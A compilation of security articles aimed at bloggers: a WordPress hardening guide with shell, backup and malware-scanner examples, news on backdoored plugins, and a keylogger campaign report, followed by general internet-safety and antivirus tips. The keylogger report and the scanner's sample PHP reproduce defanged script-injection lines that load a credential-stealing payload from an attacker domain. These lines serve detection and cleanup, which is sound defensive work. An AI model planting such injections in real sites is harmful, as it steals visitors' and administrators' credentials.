What’s a DDoS? In a distributed denial of service attack, a cyber-attacker uses multiple devices to continually create connections to a target. Eventually the target — in this case your WordPress site — becomes so inundated with requests that it can no longer respond, even to legitimate ones. This is one of the easiest and fastest ways to take a website down.

Cloudflare is a particularly useful tool for WordPress bloggers. Not only does it protect against DDoS attempts and detect potentially malicious traffic, but it operates primarily as a Content Delivery Network. A CDN speeds up a website by caching its data; users will be able to access the website much faster and there will be less load distributed to the server. Cloudflare is also completely free and can manage multiple sites at once, additionally providing analytic data through which you can measure your website’s traffic and performance.

Setup an SSL Certificate and Configure WordPress

SSL certificates can get a little technical — all you really need to know is that using an SSL certificate means that your data is going to be encrypted. And that means that people who are seeing your data being transmitted won’t be able to read it. Many websites you use probably use an SSL certificate. You can usually tell because there will be a “locked” icon by the URL and the URL will start with “https://” rather than “http://.”

Not all hosting accounts will come with an SSL certificate. You may need to purchase one through your web host as an add-on — or you may need to use a security plug-in that comes with one, such as Sucuri. Your web hosting service will be able to install the SSL certificate on your account but, either way, you’ll need to configure WordPress to use SSL.

How to Add SSL and HTTPS to WordPress

Click on your “General” settings in your administrative dashboard.

Change your WordPress and Site Address URLs to “https” rather than “http”.

If you have already added content to your WordPress site, you may also need to include a redirect. For this, you will need to browse to the main directory of your web host. This is usually called “htdocs,” but may also be your website’s name. Here you will want to modify a file called “.htaccess” to include the following text:

RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://www.[blog].com/$1 [R,L]

In the above example, [blog] will be the domain of your blog. This will redirect any requests to “http” to “https” automatically.

Update Your File Permissions

File permissions tell your web server who is allowed to view and access each of your website’s files. By default, WordPress is often installed with “777” permissions for its directories. Through FTP, you can select these directories, right click, and change these permissions to either “750” or “755.” Everyone will still be able to read these files, but modifying or deleting them will require the owner’s permissions.

Your wp-config.php file should be set to “600,” and the files within your WordPress directories should be set to “640” or “644.” These permissions will still let you do anything you need to do; they simply reduce the chances that someone else could alter or delete your files.
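The same permission changes applied from a shell, as an added example that is not part of the original guide: it assumes SSH access to the hosting account and takes the WordPress root directory as its argument, and it includes an audit helper that counts anything still writable by group or others.

```shell
#!/bin/sh
# Added example, not from the original guide: the shell equivalent of the
# FTP right-click procedure described above. Assumes SSH access to the hosting
# account and that the WordPress root directory is passed as the first argument.

# Apply the guide's recommended modes: 755 on directories, 644 on files,
# 600 on wp-config.php (it holds database credentials and security keys).
harden_wp_permissions() {
    root="$1"
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 1; }

    # Directories: owner may read/write/traverse; everyone else may only list and traverse.
    find "$root" -type d -exec chmod 755 {} +
    # Regular files: owner may read/write; everyone else may only read.
    find "$root" -type f -exec chmod 644 {} +
    # Configuration containing secrets: owner only.
    if [ -f "$root/wp-config.php" ]; then
        chmod 600 "$root/wp-config.php"
    fi
    return 0
}

# Audit helper: count paths under $1 that are still writable by group or others
# (the "777" default the guide warns about). Prints 0 after hardening.
count_group_or_world_writable() {
    find "$1" \( -perm -020 -o -perm -002 \) | wc -l | tr -d ' '
}

# Usage (run as the account user that owns the files):
#   harden_wp_permissions /path/to/wordpress
#   count_group_or_world_writable /path/to/wordpress
```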

Turn Off PHP Error Reporting

By default, many servers will send out an error message if PHP code fails — and WordPress is written in PHP. These errors are designed to help developers when they are debugging, but because they can expose parts of your website’s code, they can also be a substantial security risk. To address this, you need to turn off PHP error reporting. In the event that PHP does encounter an error, it will simply send a blank page.

This requires a modification of your wp-config.php file, which can be found via FTP (or a file browser) in the base directory of your WordPress installation. At the top of wp-config.php, below the first line, you should put:

error_reporting(0);
@ini_set('display_errors', 0);

Of course, this also means that you aren’t going to know what specifically failed in the event that your website does fail — and, in that situation, you might need to temporarily toggle errors back on.


Chapter Five: Protecting Against Your Users

Bloggers often run in packs. If you’re running a blog that has multiple contributors, then your greatest threat might not be from the outside — it may actually be your own users. Users tend to make mistakes; in fact, when businesses are hacked, it’s almost always internal. 52% of cyber attacks occur due to system failures or human error.

The Importance of Restricting Permissions

In security, there are things that are called “best practices.” These are the things that we do in an ideal world to create the lowest risk environment. One of the most important security best practices is to restrict user permissions to only what they truly need to complete their day-to-day tasks. When you do not restrict permissions appropriately, you run the risk that:

  • A single user could cause substantial damage — either intentionally or accidentally. There is no reason for a contributor to be able to delete another contributor’s posts, but they might start to do so if they think those posts were inappropriately filed under “their account.”
  • A single user login breach could become more dangerous. If a malicious user gets into a contributor’s account, they are fairly limited in the amount of damage they can do. If a malicious user gets into an administrator’s account, there’s far more potential for damage. The fewer users there are with administrative powers, the better.

It’s also a good practice not to assign temporary permissions — i.e., not to make a user an administrator for a temporary amount of time to make some adjustments. Though this is commonly done to make a job simpler, it can easily be forgotten later on.

Setting Password Restrictions

Thanks to Chapter Two, you now know how to set a good password. But that doesn’t necessarily mean that your users do. When left to their own devices, users could set very simple passwords that will easily be cracked — and that compromises your entire system. To avoid this, you can set up restrictions regarding the passwords that your users can set.

The most important factor you want to look at is length, but you also want a decent variety of characters in addition to alphanumeric ones. You may want to request at least one number (0-9) and at least one special character (_;,/`~*). Keep in mind that very restrictive password combinations actually tend to work against you rather than for you, as users will be more likely to create passwords that are difficult to remember. Difficult to remember passwords will need to be either written down or reset.

By default, WordPress core ensures that users have “strong” passwords and tests passwords for their complexity. If you have a current version of WordPress, you may not need to worry about this. But if you need to add this functionality, you can use a plug-in such as Force Strong Passwords.

Managing User Sign-Ups

New users should always be restricted to a “contributor” status, and for the best security, they should have to be manually approved. Letting users create their own accounts can be dangerous otherwise!

Log Out Idle Users

Users sometimes forget that they’ve logged into their account. When they do this, they expose the blog to tremendous risk — anyone who is on the same computer and wants to tamper with your website can. To deal with this, you can install a plug-in that will automatically log users out after they’ve been idle for a certain amount of time.

The most popular way to do this is through the Idle User Logout Plugin. This plug-in lets you select which roles will idle and how long it will take them to log out when idle. Users won’t lose their data; they’ll simply need to login again before they can continue making adjustments.


Chapter Six: Protecting Against Third-Party Utilities and Services

There are two third-party threats that you need to be most conscientious of: third-party plug-ins and third-party advertising networks. Both of these can add content and programming to your website that could either damage your site or harm your users.

Validating Third-Party Plug-Ins

Plug-ins for WordPress are generally guaranteed to be malware free; otherwise they would not be included within the WordPress repository. However, that is not the major concern — the major concern is that these plug-ins may not be as secure as they should be. Anyone can write and publish a plug-in, including an inexperienced developer who could potentially create a plug-in with security vulnerabilities. If part of your website is vulnerable, all of your website is vulnerable.

Before installing a third-party plug-in, you should ask yourself the following questions:

  • How many reviews does it have and how highly is it rated? You should avoid plug-ins that appear to have been barely used or that have just been published for the first time; they could have security issues that have not yet been discovered.
  • How polished is the plug-in and its documentation? The more documentation a plug-in has, the better — that means the developer is being conscientious and mindful of its design. Likewise, a plug-in that is visually polished will likely have been produced by someone who is detail-oriented.
  • How many other plug-ins has the developer released? The more experienced the developer is with WordPress, the more likely they are to produce solid, secured plug-ins for the platform. If they haven’t released any other plug-ins, they may not be aware of WordPress’s unique security environment.

Avoiding Malicious Third-Party Services

The most common type of malicious third-party service has to do with “malvertising.” Malvertising refers to advertisements that actually contain malicious code. Many bloggers fund their blogs through the use of third-party ads. Malvertising targets the users rather than the owner of the blog themselves, but it can also get a blog blacklisted if the malicious code is detected on their site. There are a few ways to avoid these products:

  • Only use popular services. Google Adsense and Bing Ads are two of the most popular networks, but that doesn’t mean they don’t ever contain malicious code — it just means they are less risky.
  • Invest in a monitoring solution. As noted, even popular third-party networks can be infested, especially if the malicious attacker is using a previously unknown vulnerability. A monitoring solution will identify malicious code when it is run on your site, rather than trusting the service to detect it.
  • React quickly to potential threats. If you do suspect that malicious code is being run on your site, it’s important to address it immediately — even if that means taking down your advertising while you figure the situation out. Otherwise you can lose traffic and damage your website’s reputation.

Identifying Potentially Harmful Plug-Ins or Themes

The Internet is a vast and wide place, and sometimes when looking for plug-ins or themes you can be directed to individual websites or repositories that promise some of the most popular WordPress tools. But whenever you are promised something for free, it’s likely that there’s a catch. In the case of plug-ins or themes, the catch is often a virus.

When purchasing a premium plug-in or theme, it is important to go through the WordPress.org repository or a trusted corporate site. There are many websites that promise premium plug-ins or themes for free. These assets have been stolen — and even if they don’t include malicious code, it still won’t be legal to use them.

Only Installing the Plug-Ins You Need

Though plug-ins can add some fantastic functionality, they may not always be strictly necessary for the operation of your blog. Think critically about each plug-in that you install; each one isn’t just a security risk, but will also consume the overhead of your website and ultimately slow it down.


Chapter Seven: Computers, Connections, and the Internet of Things

Consider an encrypted, password-protected hard drive, and a thief who wants the data that is held within it. It would take days or weeks for the thief to hack into the hard drive — and the thief only has a few minutes of time. What does the thief do?

The thief picks up the hard drive and walks away with it.

Protecting Your Blog Against Physical Intrusion

Today we have smartphones, tablets, and laptops, all connected to the Internet and connected to your blog. Losing any one of those items could mean compromising your blog, unless you make sure that you’ve taken the appropriate steps to protect yourself. These are:

  • Always make sure that your devices are secured. All of your devices should be protected by either a PIN or a password — and, where applicable, you should use two-factor authentication such as a fingerprint reader or an ocular scanner. Your devices should automatically lock after a certain amount of time, so that they will password protect themselves when they are idle.
  • Don’t use public computers to access your blog. You never know what could be on a public computer and you can never be too cautious. If login information is stored on that computer, someone could use that computer to log in as you. Likewise, you shouldn’t log into your email account either — because it could contain information that could be used to access your blog.
  • Never access your blog through public WiFi. A public WiFi connection can be run by anyone… including people who are trying to look at your data or insert malicious code into your data transfers. SSL largely helps with this by encrypting your website’s traffic, but there can still be potential vulnerabilities related to a public WiFi connection.

Chapter Eight: Constructing Your Disaster Preparedness Plan

It’s the blogger’s worst nightmare: what happens when your site goes down? Do you know where your backups are? How quickly can you deploy them? And how current are they? In order to avoid downtime, you have to be able to answer these questions quickly and reliably.

What is a Disaster Preparedness Plan?

A disaster preparedness plan outlines the steps that you need to take to get your website up and running again after it has been taken down. And your website could go down for any reason: your blog could be hacked, your hosting provider could go out of business, or you could even make a mistake leading to data loss.

At its most fundamental, a disaster preparedness plan usually involves backup solutions and how to re-deploy your blog’s data. But a disaster preparedness plan might also include failover services, such as the ability to redirect your traffic somewhere else while you are down, or the ability to notify your readers that there may be problems.

In general, it’s a good idea to:

  1. Have a temporary page in place that will tell your readers that your website is down and that it is expected to be back up by a certain time.
  2. Know where to find your current backups and how to restore them as quickly as possible.
  3. Be able to start and restart the services that your website depends upon, such as your web server or your database.

The Four Best Practices for Website Backups

  1. Backups should be automatic. Don’t rely upon manual backups; there will come a time when you’ll forget. Schedule your backups to run during the lowest traffic hours of your website (as they do consume some system resources), and make sure that they are running as scheduled. Don’t forget to check on them frequently; they could fail if they run out of storage space.
  2. Backups should be incremental. You should always have monthly, weekly, and daily backups to fall back on. You never know when an intrusion could occur — or when data could be lost. It’s very possible that you might find yourself having to go back several days or even several weeks to completely restore your site.
  3. Backups should be redundant. Never store your backups only in one place. Cloud backup solutions are especially useful because they are naturally redundant… but what happens if you lose access to the service provider? Ideally, you should have backups both through your web host and through a secondary service.
  4. Backups should be elsewhere. Your backups shouldn’t only be stored on your host; that’s a recipe for disaster if your hosting account itself is hacked. Likewise, you don’t want your backups to only be on a local or external drive — what happens if that drive crashes?
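As an added example (not code from this eBook, a web host or any backup plug-in), here is a small Python backup job that follows the four practices above: it is meant to run unattended from cron, keeps tiered daily, weekly and monthly copies, writes each archive to two destinations and verifies every copy by checksum before counting it as done. The `blog` site name, the directory layout and the retention counts are assumptions; the database dump step is left to mysqldump and not shown.

```python
"""Backup job sketch (added example, not a host's or plugin's backup system).
Automatic: run it from cron.  Incremental tiers: daily/weekly/monthly retention.
Redundant and elsewhere: each archive is copied to two destinations and every
copy is verified by SHA-256 before the job counts it as done."""
import hashlib
import os
import shutil
import tarfile
from datetime import date, datetime, timedelta


def backup_name(site, when):
    """Archive file name carrying the site name and the run date (assumed scheme)."""
    return f"{site}-{when:%Y%m%d}.tar.gz"


def create_archive(site_dir, staging_dir, site, when):
    """Tar the site tree (wp-content, wp-config.php, ...) into staging_dir.
    A mysqldump of the database belongs in site_dir first; that step is not shown."""
    os.makedirs(staging_dir, exist_ok=True)
    path = os.path.join(staging_dir, backup_name(site, when))
    with tarfile.open(path, "w:gz") as tar:
        tar.add(site_dir, arcname=site)
    return path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def replicate(archive, destinations):
    """Copy the archive to every destination and verify each copy's digest.
    Returns the destinations whose copy matched; a short list means one of them
    failed silently (full disk, expired credentials) and should raise an alert."""
    expected = sha256_file(archive)
    good = []
    for dest in destinations:
        os.makedirs(dest, exist_ok=True)
        target = os.path.join(dest, os.path.basename(archive))
        shutil.copyfile(archive, target)
        if sha256_file(target) == expected:
            good.append(dest)
    return good


def keep_set(dates, today, daily=7, weekly=4, monthly=3):
    """Tiered retention: keep every backup from the last `daily` days, the oldest
    backup of each of the last `weekly` ISO weeks that have one, and the oldest
    backup of each of the last `monthly` months that have one."""
    dated = sorted(dates)
    keep = {d for d in dated if (today - d).days < daily}
    weeks, months = {}, {}
    for d in dated:  # setdefault keeps the first (oldest) date seen per week/month
        weeks.setdefault(d.isocalendar()[:2], d)
        months.setdefault((d.year, d.month), d)
    keep.update(sorted(weeks.values())[-weekly:])
    keep.update(sorted(months.values())[-monthly:])
    return keep


def prune(dest, site, today):
    """Delete archives in dest that fall outside the retention tiers; returns their names."""
    prefix, suffix = f"{site}-", ".tar.gz"
    by_date = {}
    for name in os.listdir(dest):
        if name.startswith(prefix) and name.endswith(suffix):
            try:
                by_date[datetime.strptime(name[len(prefix):-len(suffix)], "%Y%m%d").date()] = name
            except ValueError:
                continue  # not one of our archives; leave it alone
    keep = keep_set(by_date, today)
    removed = sorted(name for d, name in by_date.items() if d not in keep)
    for name in removed:
        os.remove(os.path.join(dest, name))
    return removed


def demo():
    """Run the whole job on a constructed site tree in a temporary directory and
    return (verified destinations, pruned archive names)."""
    import tempfile
    root = tempfile.mkdtemp()
    site_dir = os.path.join(root, "site")
    os.makedirs(os.path.join(site_dir, "wp-content"))
    with open(os.path.join(site_dir, "wp-config.php"), "w") as f:
        f.write("<?php // constructed placeholder\n")
    today = date(2017, 12, 31)
    dests = [os.path.join(root, "host-backups"), os.path.join(root, "secondary")]
    os.makedirs(dests[0])
    for i in range(1, 60):  # pretend 59 earlier daily runs already left archives here
        open(os.path.join(dests[0], backup_name("blog", today - timedelta(days=i))), "wb").close()
    archive = create_archive(site_dir, os.path.join(root, "staging"), "blog", today)
    good = replicate(archive, dests)
    removed = prune(dests[0], "blog", today)
    shutil.rmtree(root)
    return good, removed


if __name__ == "__main__":
    verified, pruned = demo()
    print(f"verified {len(verified)} destinations, pruned {len(pruned)} old archives")
```

With 60 daily archives ending on 31 December 2017, the tiers keep 7 daily, 3 further weekly (4, 11 and 18 December) and 2 monthly (2 November and 1 December) copies, so 48 are pruned.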

Options for Backing Up Your WordPress Site

  • Your web hosting service. Most web hosting services offer their own backup system, which should be used as a secondary backup option. But don’t assume that your web host automatically does it. Notably, VPS systems (virtual private servers) usually leave it to you to install a backup solution manually.
  • A cloud-based backup solution. There are subscription-based backup solutions that are located on the cloud, which can take backups automatically from your system. WordPress offers cloud-based backups through its WordPress Security plug-in.
  • As a feature in comprehensive security plug-ins. Security plug-ins often include the ability to manage your backups, as this is a part of managing security and mitigating potential risks. Sucuri has a particularly comprehensive backup and restoration system.

An ideal backup solution will back up your website both on your website host and on a cloud solution. This gives you multiple options to recover your data and allows for almost immediate re-deployment of your site should data be lost or corrupted.


Chapter Nine: Managing and Monitoring Your WordPress Site

Your job isn’t over once you’ve configured your website and installed your tools. Your WordPress site will also need to be managed, monitored, and maintained over time. If you want to keep your website secure, you’ll need to update it regularly and defend against new and technologically-advanced threats.

Keeping Your WordPress Site Current

You may have noticed that WordPress updates itself quite frequently. These updates concern more than just functionality and improved workflow — they also address new and emerging security threats. Updating your WordPress site frequently is critical to maintaining a healthy security ecosystem.

Some security plug-ins, such as Sucuri, will routinely check to make sure that you are running the current version of WordPress. And though hiding your WordPress version can protect you from some threats, other more persistent cyber criminals may not be fooled.

Abandoning Out-of-Date Plug-Ins

WordPress tracks which plug-ins have been frequently updated and which plug-ins have not been tested with current versions. Plug-ins that are not kept current should be replaced with plug-ins that are, even if the newer plug-ins might not offer the same functionality.

Older plug-ins will have the same issues as older WordPress installations; they could contain vulnerabilities that have been identified. Once a vulnerability has been identified in an older system, all a cyber-criminal has to do is look for a blog that’s still using that old system.

Keeping Your Site Clean

Websites evolve. Over time you’ll add and remove content, install and uninstall plug-ins, and change themes. Keeping your site clean is a matter of deleting anything that you aren’t using right now: inactive plug-ins, old themes, and other unnecessary content.

Not only are these inactive items taking up space and other resources, but they could actually still represent a security risk even if they have already been deactivated. Plug-ins, in particular, need to be completely deleted in order to remove their risk. Otherwise they will still be on your server and their scripts can still be used.


Conclusion

Though it may seem that securing WordPress is difficult, it’s really just a matter of being thorough and vigilant. “Hardening” WordPress does require that you go through certain configuration steps — and that you install security-related plug-ins. But once you have properly secured your WordPress installation, it should mostly be able to take care of itself. Moving forward, your blog will be able to protect itself… and you’ll know what to do if it ever cannot.

Security plug-ins such as Sucuri and Wordfence can take a substantial amount of burden off of you as the blog owner. Both Wordfence and Sucuri will commit many of the above mentioned configuration changes on their own — and will be able to monitor and manage your website 24/7. By automating parts of your WordPress security, you’ll both be able to improve upon its accuracy and reduce the amount of time you need to spend on site administration.

There are countless threats out there — and there are many reasons why a malicious attacker might target a WordPress site. With cyber criminals rapidly becoming more persistent and threatening, it becomes necessary for bloggers to be proactive about their security solutions. A proactive blogger will be able to protect their blog’s data against even some of the most advanced threats.

Through this eBook you will have hopefully learned all of the information that you needed to learn about hardening WordPress — but the world of security is also always changing. If you want to make sure that your site is secured into the future as well, you will need to remain current on modern security threats and solutions. The job of a blogger is never over as far as website maintenance and security is concerned.

But by properly securing your website, you’ll be able to build traffic faster, develop a solid reputation, and sidestep many of the costly issues associated with having a website taken down or otherwise compromised. Securing your website is one of the first steps towards developing a solid blog that will be able to steadily grow in popularity. A secured blog will have minimal downtime and will be able to serve its user base both better and more consistently.

That’s it.

Malicious Backdoored plugins with More than 89,000 Active Installs found in WordPress Repository


WordPress has a massive ecosystem of plugins and themes, and threat actors have used it for malicious activities such as hiding PHP backdoor scripts inside WordPress plugins, even security plugins.

In this incident, existing unsupported plugins were sold to new authors, who inserted backdoor code; the goal is to insert SEO spam into the sites that have the plugin installed.

Wordfence uncovered the incident, and the WordPress security team has closed the plugins in the directory, which means they are no longer available to download from the repository.


Malicious WordPress backdoor Plugins

Duplicate Page and Post

The plugin’s function is to create a cloned post or page. The current owner of the plugin inserted backdoor scripts that make a request to cloud-wp.org and inject cloaked backlinks into the site.

It has more than 50,000 active installs, and the plugin was removed from WordPress.org on December 14, 2017.

No Follow All External Links

Behaving the same way as Duplicate Page and Post, this backdoor makes requests to cloud.wpserve.org, which returns content based on the URL; the backdoor is used to inject backlinks for SEO.

It has more than 9,000 active installs, and the plugin was removed from WordPress.org on December 19, 2017.

WP No External Links

It is the same as the previous two backdoors: it requests wpconnect.org, which returns content based on the URL, and the backdoor is used to inject backlinks for SEO.

It has more than 30,000 active installs, and the plugin was removed from WordPress.org on December 22, 2017.

Wordfence says that Orb Online paid for both the No Follow All External Links and Duplicate Page and Post plugins, and that the same threat actor was involved in purchasing and injecting backdoors into all three of these plugins, with the goal of injecting SEO spam into the thousands of websites running them.

If you have any of these plugins installed, it is highly recommended that you uninstall them immediately and scan the website for infection with Sucuri and Gravityscan.

Thousands of WordPress websites get hacked every day, so securing your blog must be top of mind. Luckily, it’s not all rocket science, as most of the tweaks only need to be made once.

Keylogger Discovered in more than 5,000 WordPress Websites


New research has revealed that more than 5,000 WordPress websites are running a keylogger, which also tries to run a crypto-miner in the browser while the infected website is being browsed.

In recent days, WordPress websites have been displaying unwanted banners at the bottom of the page, appearing 15 seconds after the website is opened, because scripts from Cloudflare[.]solutions, a domain that does not belong to Cloudflare, have been injected into the theme’s functions.php:

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

The malicious scripts are loaded on both the front end and the admin back end every time an administrator is logged in.

In this case, the second script, cors.js, is injected in encoded form; once decoded, it contains two cdnjs.cloudflare.com URLs with long hexadecimal parameters.

The domain name appears to be a genuine Cloudflare URL, but on analyzing https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js we find that it contains linterkey variables.

Further analysis revealed that linter.js contains the real payload, encoded as the hexadecimal string after the question mark in the URLs.

According to Sucuri, this script adds a handler to every input field on the website to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field.

This payload is capable of keylogging every time an administrator logs into their WordPress website.

Using this WordPress keylogger, both the username and the password are sent to the cloudflare[.]solutions server even before the user clicks the “Login” button.

The first and second waves of this attack took place in April and November; this latest wave adds the stealthy keylogging feature.

The worst part is that if this flow executes successfully on an e-commerce WordPress website, the attacker can access payment-related information.

Mitigation steps for this WordPress Keylogger

  • Performing proper pentesting for the WordPress website – Pentesting Checklist
  • As we already mentioned, the malicious code resides in the functions.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.
  • Given the keylogger functionality of this malware, you should consider all WordPress passwords compromised, so the next mandatory step of the cleanup is changing the passwords (this is highly recommended after any site hack).
  • Don’t forget to check your site for other infections too. Many sites with the Cloudflare.solutions malware also have injected Coinhive cryptocurrency miner scripts.
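The backdoored plugins above (which call out to cloud-wp.org and similar domains) and the functions.php injection described here share one detectable trait: a function hooked with add_action that talks to a host the site owner never approved. As an added example, not Wordfence’s or Sucuri’s tooling, the Python script below scans PHP source for that trait and also flags URLs on an otherwise trusted host that carry a long hexadecimal parameter, the trick used with cdnjs.cloudflare.com. The allowlist, the 40-hex-digit threshold and the sample inputs are assumptions; the samples are constructed, defanged stand-ins for the real files, not captured code.

```python
"""Scan WordPress PHP source (a plugin file or a theme's functions.php) for hooked
code that reaches out to hosts you did not approve.  Added example; it is not
Wordfence's or Sucuri's tooling.  The allowlist and sample inputs are assumptions."""
import re
from urllib.parse import urlparse

# Hosts a legitimate theme or plugin on this site may reference (assumed; tailor it).
ALLOWED_HOSTS = {"wordpress.org", "api.wordpress.org", "cdnjs.cloudflare.com"}

# URLs inside string literals, including the defanged hxxp:// and [.] forms used in reports.
URL_RE = re.compile(r"""(?:hxxps?|https?|wss?)://[^\s'"<>()]+""")
# A run of 40+ hex digits in a query string: the "long hexadecimal parameters" that
# carried the payload through a genuine cdnjs.cloudflare.com URL (threshold assumed).
HEX_BLOB_RE = re.compile(r"[0-9a-fA-F]{40,}")
FUNC_RE = re.compile(r"function\s+([A-Za-z_]\w*)\s*\([^)]*\)\s*\{")
ADD_ACTION_RE = re.compile(r"""add_action\s*\(\s*['"]([^'"]+)['"]\s*,\s*['"]([^'"]+)['"]""")


def refang(url):
    """Turn the defanged notation used in threat reports back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def suspicious_urls(text):
    """Return (url, host, reason) for URLs off the allowlist or carrying a hex payload."""
    out = []
    for raw in URL_RE.findall(text):
        parsed = urlparse(refang(raw))
        host = parsed.hostname or ""
        if host not in ALLOWED_HOSTS:
            out.append((raw, host, "host not on allowlist"))
        elif HEX_BLOB_RE.search(parsed.query):
            out.append((raw, host, "long hex payload in query string"))
    return out


def function_bodies(php):
    """Map function name -> body text using simple brace matching (good enough
    for the flat, hand-injected code these infections consist of)."""
    bodies = {}
    for m in FUNC_RE.finditer(php):
        depth, i = 1, m.end()
        while i < len(php) and depth:
            depth += {"{": 1, "}": -1}.get(php[i], 0)
            i += 1
        bodies[m.group(1)] = php[m.end():i - 1]
    return bodies


def scan(php):
    """Return findings: each function whose body contacts a suspicious host,
    together with the add_action hooks that make WordPress run it."""
    hooks = {}
    for hook, callback in ADD_ACTION_RE.findall(php):
        hooks.setdefault(callback, []).append(hook)
    findings = []
    for name, body in function_bodies(php).items():
        hits = suspicious_urls(body)
        if hits:
            findings.append({"function": name, "hooks": hooks.get(name, []),
                             "hosts": sorted({h for _, h, _ in hits}),
                             "reasons": sorted({r for _, _, r in hits})})
    return findings


# Constructed samples modelled on the infections described above (not captured files).
SAMPLE_FUNCTIONS_PHP = r"""<?php
function theme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'theme_setup');
function add_js_scripts() {
    echo "<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>";
}
add_action('wp_footer', 'add_js_scripts');
add_action('admin_footer', 'add_js_scripts');
"""
SAMPLE_PLUGIN_PHP = r"""<?php
function dpp_remote_links() {
    return wp_remote_retrieve_body(wp_remote_get('https://cloud-wp[.]org/get?site=' . home_url()));
}
add_action('wp_head', 'dpp_remote_links');
"""
CLEAN_PHP = r"""<?php
function enqueue_assets() {
    wp_enqueue_script('lib', 'https://cdnjs.cloudflare.com/ajax/libs/sample/1.0/sample.js');
}
add_action('wp_enqueue_scripts', 'enqueue_assets');
"""
SAMPLE_DECODED_LOADER = "src='https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js?" + "7f" * 40 + "'"

if __name__ == "__main__":
    for label, src in [("functions.php", SAMPLE_FUNCTIONS_PHP), ("plugin", SAMPLE_PLUGIN_PHP), ("clean", CLEAN_PHP)]:
        print(label, scan(src))
    print("decoded loader", suspicious_urls(SAMPLE_DECODED_LOADER))
```

A host allowlist alone would have passed the cdnjs.cloudflare.com loader, which is why the query-string check is there; a finding is a lead for manual review, not proof of compromise.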

6 Ways to Protect Yourself on the Internet

Whether you are an employee, owner, or a home worker, your work will certainly involve the internet. However, while the digital world offers a wide range of tools to boost productivity, it is also a hotbed for malware and fraud tools designed to steal your information.

Wondering how you can stay safe while online? Read on for 6 must-know tips every savvy netizen should know.

1. Keep your antivirus updated

In simple terms, an antivirus works by scanning your machine for malware and helping you restrict its spread.

Unfortunately, malware is constantly evolving. As these internet nasties grow in number and sophistication, the best defense is to frequently update your antivirus.

By updating your antivirus, you make sure your system is up to speed with newly identified viruses and equipped with the latest tools to remove them.

2. Hide your IP address

If you don’t like stalkers knowing where you are physically, chances are you don’t want snoops knowing where you are (or what you’re doing) online.

Whether you want to access social media while abroad, watch the latest sports online, or just want to conceal your internet activity from your ISP, you can’t go wrong by making a habit of hiding your IP.

There are many ways to hide your IP address. The safest and most reliable way to do this is to use a VPN (more on this later).

3. Use a strong password

If you’re still using “Password” as your password in 2017, you should probably stop using the internet (for your own good). Your passwords are like the keys to your apartment. Don’t settle for one that any stranger can guess and replicate.

There are many techniques for building strong passwords, from mixing in a variety of letters, numbers, and symbols to using two-factor authentication for additional security. Another avenue to consider is using a password generator to create passwords that cannot be easily cracked by brute force. You may also want to use a password manager to help you store your passwords.

4. Don’t access confidential information on public networks and machines

With the prevalence of Wi-Fi, it’s often a temptation to connect to a public network while traveling or working on the go. The same can often be said for using public computers in libraries and airports.

While it’s not a problem to use public machines and networks for non-private matters, it would be a very bad idea to log into your social media, bank, or work accounts while on these machines/networks. A bugged machine may have keyloggers installed to track what you type, while a rogue network may capture your data and send it to nefarious individuals while injecting malware into your own device.

5. Beware of cookies

Cookies were designed to help websites remember visitors, allowing them to provide a more personalized experience to each user. However, they can also be abused to track your online activity and to send you targeted advertisements.

To protect yourself from malicious cookies, remember to delete any cookies after each browsing session. You can also use a private web browser such as Tor.

6. Use a VPN

A VPN is a Swiss Army knife for online safety. It hides your IP address (as mentioned above), anonymizes the data you send into the internet, and can even let you access geolocation-specific discounts and content.

That said, be careful when choosing a VPN provider. Make sure the provider offers a wide range of locations, does not keep user-identifying logs, and is not a free VPN service. Maintaining high quality VPN servers is not a cheap proposition, and if they’re not charging you for it, they’re almost certainly making money by selling your activity to a third party somewhere else.

The internet remains a wonderful place for productivity, entertainment, and innovation. However, many dangers await the unwary. Remember to follow these practices, exercise common sense whenever you’re unsure, and you’ll be able to enjoy the best of the internet without worry.

Best Antivirus 2017


Do you need an antivirus program?

In a nutshell: yes.

Back in the early days of computing, viruses and other forms of malware were relatively rare.

Often coded by lone wolves intent on having ‘fun’ or creating a small amount of frustration among the early adopters, the creation of new malicious code was so low-key that the early security companies would only send out updates to their programs on floppy disk every few months.

Subscribers could sleep well at night, safe in the knowledge that their PCs were highly unlikely to become infected with anything nasty.

Fast forward to the end of last year and the threat landscape now looks altogether different.

As The Register reported in September 2014, the number of new malware samples released every day is quite staggering: 227,747, equivalent to 158 new threats per minute.

Even more interesting is the fact that only 9% of new threats in the third quarter of 2014 were viruses – the vast majority (75%) of new malicious code being written today is trojans, which are typically designed to steal banking logins and other sensitive information.

Your best defence against the threat posed by trojans, worms, viruses and rootkits is to have security software installed on all your machines, especially those that are connected to the internet – as most are these days.

By installing an antivirus program, you will greatly improve your chances of detecting and neutralising those threats.

While no AV program offers a ‘magic bullet,’ they are a critical first step in securing your device.

Do the free tools baked into recent editions of Windows offer sufficient protection?

Microsoft has, for some time now, offered free security tools to owners of its Windows operating system, either through the downloadable Microsoft Security Essentials or through Windows Defender which can be found bundled with Windows 8, 8.1 and now 10.

While both are free, compact, easy to use and offer some level of protection, independent testing labs, such as AV-Comparatives, have often concluded that their effectiveness is quite limited.

Therefore our advice is to avoid Microsoft’s baked in security and look instead to some of the many alternatives.

Are free antivirus programs good enough?

Not all antivirus programs are created equal and many attempt to differentiate themselves from the competition either via the additional features they offer or by price.

As we believe in offering you an informed choice, our reviews look at both paid and free security software.

While free AV programs could be right for you – free is free after all, and your needs may be fairly modest – they do tend to skimp on the list of features they offer, or the amount or cost of the support they come with.

Our antivirus reviews will evaluate just what you will get from a free antivirus program and assess whether that offers better value for your needs versus a paid alternative.

